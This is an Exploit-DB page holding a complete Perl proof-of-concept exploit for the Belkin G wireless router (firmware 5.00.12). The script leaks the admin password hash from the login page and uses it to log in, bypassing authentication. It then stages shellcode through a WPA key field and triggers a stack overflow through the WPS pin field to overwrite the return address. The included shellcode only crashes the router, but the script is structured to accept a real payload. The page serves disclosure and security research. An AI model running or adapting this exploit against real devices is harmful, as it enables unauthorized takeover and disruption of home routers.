Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution

EDB-ID:

27873

CVE:


EDB Verified:

Author:

Aodrulez

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2013-08-26

Vulnerable App: 
+-----------------------------------+
| Belkin G Wireless Router RCE PoC. |
+-----------------------------------+



Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version     : 1.18
Hardware         : F5D7234-4 v5 (01)
Author           : Aodrulez.
Email            : atul.alex@orchidseven.com
Twitter          : http://twitter.com/Aodrulez

 
+---------+
| Details |
+---------+
 
The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.
 
This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.


Video Demo :
http://www.youtube.com/watch?v=MtrYs-f6X3E


+---------+
| Exploit |
+---------+

#!/usr/bin/perl

use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);


# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";



sub Authenticate()
{
  print "[+] Trying to authenticate.\n";
  $url= "http://$ip/login.stm";
  $response = $browser->get( $url);
  my @aod= $response->content =~ m/var password = "(.*)";/g;
  if(!$aod[0])
  {
	 print "[-] Damn! Something went wrong. This might not work here :-/\n";
	 exit;
  }
  else
  {
	 $passHash=$aod[0];
	 print "[+] Admin Password = $passHash (MD5 Hash).\n";
  }

 print "[+] Time to authenticate you!\n";
 $url = "http://$ip/cgi-bin/login.exe";
 $response = $browser->post( $url,
    [ 'totalMSec' => "1377121454.99",  
      'pws' => "$passHash",
    ,]
  );
  
  if( $response->content =~ /index/ ) 
  {
    print "[+] Logged in successfully as 'Admin'!\n";
    print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
  } else {
    print "[-] Login failed! This might not work here :-/\n";
    exit;
  }

  print "\n[+] Continue with exploitation? (Y/N) : ";
  my $temp=<STDIN>;
  if ($temp=~"Y" || $temp=~"y")
  {
    Exploit();
  }
  else
  {
    print "[+] Have fun!\n\n";
    exit;
  }
}


sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
  print "[+] Stage 1 : Allocating shellcode.\n";

  if (length($shellcode) > 120)
  {
   print "[-] Shellcode is too big! (120 bytes Max)\n";
   exit;
  }
  print "[+] Shellcode length : ".length($shellcode)."\n";

  # Fill the rest with nops. Not needed but good to have.
  # Shellcode size should be ideally a multiple of 4 as this is MIPS.
  my $nopsize=120-length($shellcode);
  $shellcode=$shellcode.("\x20"x$nopsize);

 $url = "http://$ip/cgi-bin/wireless_WPA.exe";
 $response = $browser->post( $url,
    [ 'wpa_authen' => "1",  
      'wpa_psk' => '0',
      's_rekeysec' => '900000',
      's_rekeypkt' => '1000',
      'w802_rekey' => '0',
      'encryption' => '3',
      'security_type' => '4',
      'authentication' => '3',
      'encryption_hid' => '3',
      'wpa_key_text' => "ssss",
      'wpa_key_pass' => "$shellcode",
      'obscure_psk' => '1',
      'sharedkey_alter' => '',
      'sharedkey_alter1' => '1',
      
    ,]
  );
 
  if( !$response->content ) 
  {
     print "[-] Damn! Something went wrong. This might not work here :-/\n";  
  }
  else 
  {   
    print "[+] Stage 1 seems to have gone well.\n";
  }

# Stage 2: Trigger Stack Overflow & overwrite RA
print "[+] Stage 2 : Triggering Return Address overwrite.\n";

my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC   -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;

 $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
 $response = $browser->post( $url,[ 'pin' => "$payload"]);
 if( !$response->content ) 
  {
    print "[-] Damn! Something went wrong. This might not work here :-/\n";  
  } 
 else 
 {
    print "[-] Done! \\m/\n";
 }

}

sub Welcome()
{
  print "\n\n+------------------------------------------+\n";
  print "|  Belkin G Wireless Router Remote Exploit |\n";
  print "|     (Authentication bypass & RCE PoC)    |\n";
  print "+------------------------------------------+\n";
  print "[+] By Aodrulez.\n";
  print "\n[+] Usage   : perl $0 router_ip";
  print "\n[!] Example : perl $0 192.168.2.1";

  if (!$ARGV[0])
  {
    print "\n[-] (o_0) Seriously??\n";
    exit;
  }

  $ip=$ARGV[0];
  print "\n[+] Target IP : $ip\n";

}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.



+-------------------+
| Greetz Fly Out To |
+-------------------+
     
    
1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in
   
   
+-------+
| Quote |
+-------+
   
“I would rather die of passion than of boredom.” - Vincent van Gogh.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services